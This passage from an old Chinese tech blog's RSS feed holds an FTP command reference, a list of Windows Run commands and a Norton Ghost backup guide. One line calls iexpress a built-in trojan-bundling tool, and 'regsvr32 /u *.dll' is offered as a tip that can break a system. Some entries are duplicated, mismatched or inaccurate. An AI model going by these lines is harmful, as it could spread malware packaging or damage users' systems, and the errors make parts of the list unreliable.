<BR><BR>35.modtime&nbsp;file-name：显示远程主机文件的最后修改时间。&nbsp; <BR>36.mput&nbsp;local-file：将多个文件传输至远程主机。 <BR><BR>37.newer&nbsp;file-name：&nbsp;如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近，则重传该文件。 <BR>38.nlist[remote-dir][local-file]：显示远程主机目录的文件清单，并存入本地硬盘的local-file。 <BR><BR>39.nmap[inpattern&nbsp;outpattern]：设置文件名映射机制，&nbsp;使得文件传输时，文件中的某些字符相互转换，&nbsp;如：nmap&nbsp;$1.$2.$3[$1，$2].[$2，$3]，则传输文件a1.a2.a3时，文件名变为a1，a2。&nbsp;该命令特别适用于远程主机为非UNIX机的情况。 <BR>40.ntrans[inｃhars[outchars]]：设置文件名字符的翻译机制，如ntrans1R，则文件名LLL将变为RRR。 <BR><BR>41.open&nbsp;host[port]：建立指定ftp服务器连接，可指定连接端口。&nbsp; <BR>42.passive：进入被动传输方式。 <BR><BR>43.prompt：设置多个文件传输时的交互提示。&nbsp; <BR>44.proxy&nbsp;ftp-cmd：在次要控制连接中，执行一条ftp命令，&nbsp;该命令允许连接两个ftp服务器，以在两个服务器间传输文件。第一条ftp命令必须为open，以首先建立两个服务器间的连接。 <BR>45.put&nbsp;local-file[remote-file]：将本地文件local-file传送至远程主机。&nbsp; <BR>46.pwd：显示远程主机的当前工作目录。 <BR><BR>47.quit：同bye，退出ftp会话。&nbsp; <BR>48.quote&nbsp;arg1，arg2...：将参数逐字发至远程ftp服务器，如：quote&nbsp;syst. <BR><BR>49.recv&nbsp;remote-file[local-file]：同get。&nbsp; <BR>50.reget&nbsp;remote-file[local-file]：类似于get，&nbsp;但若local-file存在，则从上次传输中断处续传。 <BR><BR>51.rhelp[cmd-name]：请求获得远程主机的帮助。&nbsp; <BR>52.rstatus[file-name]：若未指定文件名，则显示远程主机的状态，&nbsp;否则显示文件状态。 <BR><BR>53.rename[from][to]：更改远程主机文件名。&nbsp; <BR>54.reset：清除回答队列。 <BR><BR>55.restart&nbsp;marker：从指定的标志marker处，重新开始get或put，如：restart&nbsp;130。&nbsp; <BR>56.rmdir&nbsp;dir-name：删除远程主机目录。 <BR><BR>57.runique：设置文件名只一性存储，若文件存在，则在原文件后加后缀.1，&nbsp;.2等。&nbsp; <BR>58.send&nbsp;local-file[remote-file]：同put。 <BR><BR>59.sendport：设置PORT命令的使用。&nbsp; <BR>60.site&nbsp;arg1，arg2...：将参数作为SITE命令逐字发送至远程ftp主机。 <BR><BR>61.size&nbsp;file-name：显示远程主机文件大小，如：site&nbsp;idle&nbsp;7200。&nbsp; <BR>62.status：显示当前ftp状态。 <BR><BR>63.struct[struct-name]：将文件传输结构设置为struct-name，&nbsp;缺省时使用stream结构。&nbsp; <BR>64.sunique：将远程主机文件名存储设置为只一(与runique对应)。 <BR><BR>65.system：显示远程主机的操作系统类型。&nbsp; <BR>66.tenex：将文件传输类型设置为TENEX机的所需的类型。 <BR><BR>67.tick：设置传输时的字节计数器。&nbsp; <BR>68.trace：设置包跟踪。 <BR><BR>69.type[type-name]：设置文件传输类型为type-name，缺省为ascii，如:type&nbsp;binary，设置二进制传输方式。&nbsp; <BR>70.umask[newmask]：将远程服务器的缺省umask设置为newmask，如：umask&nbsp;3 <BR><BR>71.user&nbsp;user-name[password][account]：向远程主机表明自己的身份，需要口令时，必须输入口令，如：user&nbsp;anonymous&nbsp;my@email。&nbsp; <BR>72.verbose：同命令行的-v参数，即设置详尽报告方式，ftp&nbsp;服务器的所有响&nbsp;应都将显示给用户，缺省为on. <BR><BR>73.?[cmd]：同help. <BR><BR>#11&nbsp;十一： <BR><BR>7：计算机运行命令全集&nbsp;winver---------检查Windows版本 <BR>wmimgmt.msc----打开windows管理体系结构 <BR>wupdmgr--------windows更新程序 <BR>winver---------检查Windows版本 <BR>wmimgmt.msc----打开windows管理体系结构 <BR>wupdmgr--------windows更新程序 <BR>wscript--------windows脚本宿主设置 <BR>write----------写字板winmsd-----系统信息 <BR>wiaacmgr-------扫描仪和照相机向导 <BR>winchat--------XP自带局域网聊天 <BR>mem.exe--------显示内存使用情况 <BR>Msconfig.exe---系统配置实用程序&nbsp; <BR>mplayer2-------简易widnows&nbsp;media&nbsp;player <BR>mspaint--------画图板 <BR>mstsc----------远程桌面连接 <BR>mplayer2-------媒体播放机 <BR>magnify--------放大镜实用程序 <BR>mmc------------打开控制台 <BR>mobsync--------同步命令 <BR>dxdiag---------检查DirectX信息 <BR>drwtsn32------&nbsp;系统医生 <BR>devmgmt.msc---&nbsp;设备管理器 <BR>dfrg.msc-------磁盘碎片整理程序 <BR>diskmgmt.msc---磁盘管理实用程序 <BR>dcomcnfg-------打开系统组件服务 <BR>ddeshare-------打开DDE共享设置 <BR>dvdplay--------DVD播放器 <BR>net&nbsp;stop&nbsp;messenger-----停止信使服务 <BR>net&nbsp;start&nbsp;messenger----开始信使服务&nbsp; <BR>notepad--------打开记事本 <BR>nslookup-------网络管理的工具向导 <BR>ntbackup-------系统备份和还原 <BR>narrator-------屏幕"讲述人" <BR>ntmsmgr.msc----移动存储管理器 <BR>ntmsoprq.msc---移动存储管理员操作请求 <BR>netstat&nbsp;-an----(TC)命令检查接口 <BR>syncapp--------创建一个公文包 <BR>sysedit--------系统配置编辑器 <BR>sigverif-------文件签名验证程序 <BR>sndrec32-------录音机 <BR>shrpubw--------创建共享文件夹 <BR>secpol.msc-----本地安全策略 <BR>syskey---------系统加密，一旦加密就不能解开，保护windows&nbsp;xp系统的双重密码 <BR>services.msc---本地服务设置 <BR>Sndvol32-------音量控制程序 <BR>sfc.exe--------系统文件检查器 <BR>sfc&nbsp;/scannow---windows文件保护 <BR>tsshutdn-------60秒倒计时关机命令 <BR>tourstart------xp简介（安装完成后出现的漫游xp程序） <BR>taskmgr--------任务管理器 <BR>eventvwr-------事件查看器 <BR>eudcedit-------造字程序&nbsp; <BR>explorer-------打开资源管理器 <BR>packager-------对象包装程序 <BR>perfmon.msc----计算机性能监测程序 <BR>progman--------程序管理器 <BR>regedit.exe----注册表&nbsp; <BR>rsop.msc-------组策略结果集 <BR>regedt32-------注册表编辑器 <BR>rononce&nbsp;-p&nbsp;----15秒关机 <BR>regsvr32&nbsp;/u&nbsp;*.dll----停止dll文件运行 <BR>regsvr32&nbsp;/u&nbsp;zipfldr.dll------取消ZIP支持 <BR>cmd.exe--------CMD命令提示符 <BR>chkdsk.exe-----Chkdsk磁盘检查 <BR>certmgr.msc----证书管理实用程序 <BR>calc-----------启动计算器 <BR>charmap--------启动字符映射表 <BR>cliconfg-------SQL&nbsp;SERVER&nbsp;客户端网络实用程序 <BR>Clipbrd--------剪贴板查看器 <BR>conf-----------启动netmeeting <BR>compmgmt.msc---计算机管理 <BR>cleanmgr-------**整理 <BR>ciadv.msc------索引服务程序 <BR>osk------------打开屏幕键盘 <BR>odbcad32-------ODBC数据源管理器 <BR>oobe/msoobe&nbsp;/a----检查XP是否激活 <BR>lusrmgr.msc----本机用户和组 <BR>logoff---------注销命令 <BR>iexpress-------木马捆绑工具，系统自带 <BR>Nslookup-------IP地址侦测器 <BR>fsmgmt.msc-----共享文件夹管理器 <BR>utilman--------辅助工具管理器 <BR>gpedit.msc-----组策略&nbsp;<img src ="http://www.cnitblog.com/yide/aggbug/6210.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2006-01-17 10:41 <a href="http://www.cnitblog.com/yide/archive/2006/01/17/6210.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>FW: ghost使用方法</title><link>http://www.cnitblog.com/yide/archive/2005/12/29/5885.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Thu, 29 Dec 2005 06:43:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2005/12/29/5885.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/5885.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2005/12/29/5885.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/5885.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/5885.html</trackback:ping><description><![CDATA[<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; WORD-BREAK: break-all; TEXT-INDENT: 18pt; mso-pagination: widow-orphan; mso-margin-top-alt: auto; mso-margin-bottom-alt: auto"><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">Ghost</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">用法</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN"><BR></SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">一</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">.</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">制作主分区镜像</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">备份</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">C</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">盘</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">)<BR>1.</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">启动机器后</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">按</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">F8,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">选</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">5,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">选</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">Ghost</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">文件所在的磁盘</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">进文件夹</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">进</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">Ghost</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">文件</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">执行</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">Ghost.<BR>2.</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">选择</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">:</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">选择</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">Partition(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">分区操作选项</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">),</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">然后选择</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">TO Image(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">分区内容备份成镜像</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">),</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">选择源分区所在的硬盘</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">一般为</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">“1”),</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">选择要制作镜像文件的分区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">即源分区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">)</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">，这里选择分区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">“1”(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">即</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">C</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">分区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">)</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">，选择镜像文件保存的位置</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">要特别注意的是不能选择需要备份的分区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">C).<BR></SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt">3.再在“Filename”文本框键入镜像文件名称，如“C_BAK”或“C_BAK.GHO”.<BR>4.选择文件压缩比:选"No"(“No”表示不做任何压缩；“Fast”的意思是进行小比例压缩但是备份工作的执行速度较快；“High”是采用较高的压缩比但是备份速度相对较慢)<BR>5.完成<BR>6.示例:&nbsp;&nbsp; （以我的电脑为例） 启动→F8→选5→I:→CD BAK→CD Ghost→Ghost→选Local→选Partition→选TO Image→选1→选1→选最后区(I:)→输入备份文件名,如Windows98-2.GHO→选"NO"→完成<BR>二.恢复主分区镜像(恢复C盘)<BR>&nbsp;&nbsp;&nbsp;&nbsp;运行Norton Ghost，在主菜单中选择“Local→Partition→From Image”项.从备份的存储盘(如I:盘)中选择刚才的主分区镜像文件C_BAK.GHO。</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">确定源分区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">(</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">如</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">1,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">一般都只备一个区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">),</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">选择要恢复镜像的目标硬盘，一般来说是主硬盘。选择要恢复镜像的目标硬盘中的目标分区</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">C</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">，注意目标分区千万不能选错</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">.</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">确定后有问话时</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">,</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">点击</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">“Y”</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">后就开始恢复操作。</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN"> <?xml:namespace prefix = o ns = "urn:schemas-microsoft-com:office:office" /><o:p></o:p></SPAN></P>
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt; WORD-BREAK: break-all; TEXT-INDENT: 18pt; mso-pagination: widow-orphan"><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">如果想更省事，安一个冰点还原。这个软件呀，可以有选择的还原分区，所以比较体贴，只需要把系统盘（</SPAN><SPAN lang=EN-US style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">C:</SPAN><SPAN lang=ZH-CN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt; mso-fareast-language: ZH-CN">）设为还原模式就可以高枕无忧了，系统一重启系统盘都是你新做好的系统，也不用怕什么病毒了。</SPAN><SPAN style="FONT-SIZE: 9pt; FONT-FAMILY: 新細明體; mso-bidi-font-family: 新細明體; mso-font-kerning: 0pt">哈哈，赶快装一个吧。<SPAN lang=EN-US><o:p></o:p></SPAN></SPAN></P>
<P class=MsoNormal style="MARGIN: 0cm 0cm 0pt"><SPAN lang=EN-US><o:p>&nbsp;</o:p></SPAN></P><img src ="http://www.cnitblog.com/yide/aggbug/5885.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2005-12-29 14:43 <a href="http://www.cnitblog.com/yide/archive/2005/12/29/5885.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>